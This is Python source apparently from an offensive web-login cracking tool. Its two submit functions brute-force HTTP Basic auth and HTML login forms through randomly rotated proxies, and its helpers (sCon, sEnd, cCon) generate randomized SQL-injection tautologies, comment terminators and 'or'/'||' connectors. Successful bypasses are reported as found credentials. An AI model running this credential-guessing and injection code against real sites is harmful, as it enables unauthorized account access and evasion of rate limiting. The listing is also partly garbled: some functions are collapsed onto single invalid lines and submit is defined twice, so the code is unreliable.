def submit(options, login_field, creds, result):
    """Try one credential pair against ``options.url`` over HTTP Basic auth.

    Outcome signalling is done through ``events``; the return value is only
    partially meaningful: ``True`` when the username already appears in
    ``result`` (second element of each queued entry, so the pair is skipped),
    ``False`` when the request raised, and ``None`` (fall-through) otherwise.

    Args:
        options: carries ``url``, ``proxy`` and ``verbose``.
        login_field: accepted for signature compatibility; not read here.
        creds: a ``(password, username)`` pair — note the order.
        result: a queue-like object exposing ``.queue`` and ``.put``.

    NOTE(review): a second ``submit`` with the same parameter list appears
    later in this listing; if both live in the same module the later
    definition shadows this one at import time — confirm which is intended.
    """
    password, username = creds
    # Skip usernames for which a hit was already recorded.
    if username in [x[1] for x in list(result.queue)]:
        return True
    try:
        proc = Browser()
        if options.proxy:
            proxyAddr = list_choose_randomly(options.proxy)
            proc.set_random_proxy(proxyAddr)
        else:
            proxyAddr = ""
        resp = proc.open_url(options.url, auth=(username, password))
        # Classification is purely status-code based: 401 -> rejected,
        # any other code above 400 -> reported as an error, everything
        # else (including 2xx/3xx) -> treated as a hit.
        if resp.status_code == 401:
            if options.verbose:
                events.fail("['%s':%s'] <==> %s" % (username, password, proxyAddr), title=proc.get_title())
        elif resp.status_code > 400:
            events.error(
                "[%s] ['%s': '%s']" % (proc.get_url(), username, password),
                "%s" % resp.status_code)
        else:
            events.found(username, password, proc.get_title())
            result.put([options.url, username, password])
    except Exception as error:
        events.error("%s" % (error), "BRUTE")
        return False
    finally:
        # NOTE(review): ``proc`` is only bound once ``Browser()`` returns; if
        # the constructor itself raises, this line raises NameError and masks
        # the original exception.
        proc.close()
def random_user_agent(): """ Generate agent of client randomly :return: string = agent value (PC) """ # TODO better useragent with library (or create my own - takes time) from cores.actions import list_choose_randomly return list_choose_randomly(data.getAgent().split("\n"))
def sCon(): conType = list_choose_randomly(["equal", "static", "compare"]) # Could be faster than create a dict and call element from dict if conType == "static": return list_choose_randomly(["not false", "true"]) elif conType == "compare": genType = list_choose_randomly(["like", "rlike", "not like", "gl"]) if genType == "gl": _stri1, _stri2 = string_gen_randomly( select_type="dig"), string_gen_randomly(select_type="dig") if int(_stri1) > int(_stri2): return "%s > %s" % (_stri1, _stri2) else: return "%s > %s" % (_stri2, _stri1) elif genType == "not like": while True: _stri1, _stri2 = string_gen_randomly( select_type="char"), string_gen_randomly( select_type="char") # MAKE SURE WE ARE HAVING NOT LIKE if _stri1 != _stri2: break return "'%s' %s '%s'" % (_stri1, genType, _stri2) else: _stri = string_gen_randomly(len_min=3, len_max=5, select_type="char") return "'%s' %s '%s'" % (_stri, genType, _stri) elif conType == "equal": genType = list_choose_randomly(["char", "dig"]) _stri = string_gen_randomly(len_min=3, len_max=5, select_type=genType) if genType == "char": return "'%s'='%s'" % (_stri, _stri) elif genType == "dig": return "%s=%s" % (_stri, _stri)
def sEnd():
    """Return a random SQL comment terminator: ``-- --``, ``#`` or ``--``.

    These literal tails are a convenient signature when inspecting request
    logs for injection attempts.
    """
    return list_choose_randomly(["-- --", "#", "--"])
def cCon():
    """Return a random SQL logical connector: ``or`` or ``||``."""
    return list_choose_randomly(["or", "||"])
def submit(options, login_field, tryCred, result):
    """Submit one credential pair to the login form at ``options.url``.

    The verdict is tracked in the local ``isLoginSuccess`` and reported from
    the ``finally`` block, so that it is emitted whether the body returns or
    raises.  Possible states, all visible below:

    * ``"False"``     – default; the login form is still present afterwards.
    * ``"blocked"``   – no login form was found on the initial page.
    * ``"SQLi"``      – ``check_sqlerror`` matched the post-submit response.
    * ``"error"``     – no login form remained but the status code is >= 400.
    * ``"True"``      – no login form remained and the status code is < 400;
                        the pair is recorded in ``result``.
    * ``"exception"`` – the request or analysis raised.

    Return value: ``True`` when the username is already in ``result`` or the
    form path completed, ``False`` when no login form was found, ``None``
    after an exception.

    Args:
        options: carries ``url``, ``proxy``, ``verbose``, ``txt`` (baseline
            response body as bytes), ``block_text`` and ``exceptions()``.
        login_field: the previously seen login form, compared against the
            freshly parsed one to report a changed form.
        tryCred: a ``(password, username)`` pair — note the order.
        result: a queue-like object exposing ``.queue`` and ``.put``.

    The helpers ``find_login_form``, ``get_redirection``, ``get_domain``,
    ``check_sqlerror``, ``list_choose_randomly`` and ``events`` are not
    defined in this block.
    """
    password, username = tryCred
    # Skip usernames for which a hit was already recorded.
    if username in [x[1] for x in list(result.queue)]:
        return True
    from cores.browser import Browser
    isLoginSuccess = "False"
    try:
        proc = Browser()
        if options.proxy:
            # Set proxy connect
            proxy_address = list_choose_randomly(options.proxy)
            proc.set_random_proxy(proxy_address)
        else:
            proxy_address = ""
        proc.open_url(options.url)
        _form = find_login_form(proc.forms())
        if not _form:
            # No form on the landing page: remember the body as the
            # "blocked" reference text and give up on this attempt.
            options.block_text = proc.get_response()  # TODO check if block text changes
            if options.verbose:
                isLoginSuccess = "blocked"
                events.error("Get blocked", "BRUTE")
            return False
        else:
            form_control, form_fields = _form
            if options.verbose and login_field != _form:
                events.info("Login form has been changed", "BRUTE")
            resp = proc.form_submit(form_control, form_fields, tryCred)
            from cores.analysis import get_response_diff
            # Diff of the baseline body against the post-submit body.
            # NOTE(review): ``.decode('utf-8')`` is strict and raises on
            # non-UTF-8 bodies, which lands in the ``except`` path below.
            text_changed, source_changed = get_response_diff(
                options.txt.decode('utf-8'), resp.content.decode('utf-8'))
            """
            If there is no other login form, check all changes in response
            If there is no login request from all new urls -> successfully
            == > Behavior: Login fail, click here or windows.location = login_page
            """
            # "Login form is still there. Oops"
            if find_login_form(proc.forms()):
                isLoginForm = True
            else:
                isLoginForm = False
            if not isLoginForm:
                # Follow same-domain redirect targets extracted from the diff
                # and look for a login form on each; the first hit stops.
                for new_url in get_redirection(source_changed):
                    if not new_url.startswith("http") and not new_url.endswith(
                            options.exceptions()):
                        try:
                            from urllib.parse import urljoin
                        except ImportError:
                            from urlparse import urljoin
                        new_url = urljoin(options.url, new_url)
                    if new_url and get_domain(options.url) == get_domain(new_url):
                        proc.open_url(new_url)
                        if find_login_form(proc.forms()):
                            isLoginForm = True
                            break
                        else:
                            isLoginForm = False
            if not isLoginForm:
                """
                Check SQL Injection
                1. SQL Injection
                2. Login successfully: No SQLi + No Login form
                """
                if check_sqlerror(proc.get_response()):
                    isLoginSuccess = "SQLi"
                elif text_changed == source_changed and text_changed != options.block_text and options.block_text:
                    # Response changed uniformly but differs from the stored
                    # block text: left as "False" on purpose.
                    pass
                else:
                    if resp.status_code >= 400:
                        isLoginSuccess = "error"
                    else:
                        isLoginSuccess = "True"
            # "If we tried login form with username+password field"
            else:
                pass
            return True
    except Exception as error:
        """
        Sometimes, web servers return error code because of bad configurations, but our cred is true.
        This code block showing information, for special cases
        """
        isLoginSuccess = "exception"
        events.error("%s" % (error), "BRUTE")
    finally:
        # Reporting keyed on the final state; ``resp``/``text_changed`` are
        # only read in states that are set after they were assigned.
        if isLoginSuccess == "SQLi":
            events.success("SQL Injection bypass", "BRUTE")
            events.info("['%s': '%s']" % (username, password))
        elif isLoginSuccess == "error" and options.verbose:
            if username:
                events.error(
                    "['%s':'%s'] <--> %s" % (username, password, proxy_address),
                    "%s" % (resp.status_code))
            else:
                events.error("[%s] <--> %s" % (password, proxy_address),
                             "%s" % (resp.status_code))
        elif isLoginSuccess == "True":
            if username:
                events.found(username, password, proc.get_title())
                result.put([options.url, username, password])
            else:
                events.found('', password, proc.get_title())
                result.put([options.url, username, password])
        elif isLoginSuccess == "False" and options.verbose:
            if username:
                events.fail(
                    "['%s':'%s'] <==> %s" % (username, password, proxy_address),
                    text_changed, proc.get_title())
            else:
                events.fail("['%s'] <==> %s" % (password, proxy_address),
                            text_changed, proc.get_title())
        # NOTE(review): ``proc`` is only bound once ``Browser()`` returns; if
        # the constructor itself raises, this line raises NameError.
        proc.close()